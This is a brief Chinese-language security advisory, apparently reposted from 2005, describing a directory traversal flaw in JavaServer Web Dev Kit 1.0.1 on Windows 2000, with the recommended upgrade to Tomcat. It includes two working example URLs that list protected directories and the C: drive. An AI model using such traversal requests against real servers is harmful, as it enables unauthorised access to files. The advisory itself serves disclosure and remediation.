|
|
|
JavaServer Web Dev Kit(JSWDK) for win2000 目录遍历漏洞 |
| [来源]www.jspsky.com管理员
[作者]网络文摘 [时间]2005-2-21
|
推荐等级:
点击:
|
涉及程序:
JavaServer Web Dev Kit(JSWDK)
描述:
JavaServer Web Dev Kit(JSWDK) for win2000 目录遍历漏洞
详细:
发现装了 JavaServer Web Dev Kit(JSWDK)1.0.1 的 WINDOWS NT/2000 系统存在漏洞,
攻击者通过构造特殊的 URL 请求能访问未授权文件。
exploits:
http://localhost:8080/examples//WEB-INF/
会列出 /WEB-INF/ 目录 .
http://localhost:8080/../examples//WEB-INF/../../../../../
如果 JSWDK 被装在 c: ,此请求将会列出 c: 下所有目录和文件
受影响系统:
JavaServer Web Dev Kit(JSWDK)1.0.1 for win2000
解决方案:
CNNS 建议您升级 JSWDK 版本
建议您升级到tomcat. |
|
您的位置: 首页 -> 文章分类 -> JSP环境 -> JavaServer Web Dev Kit(JSWDK) for win2000 目录遍历漏洞
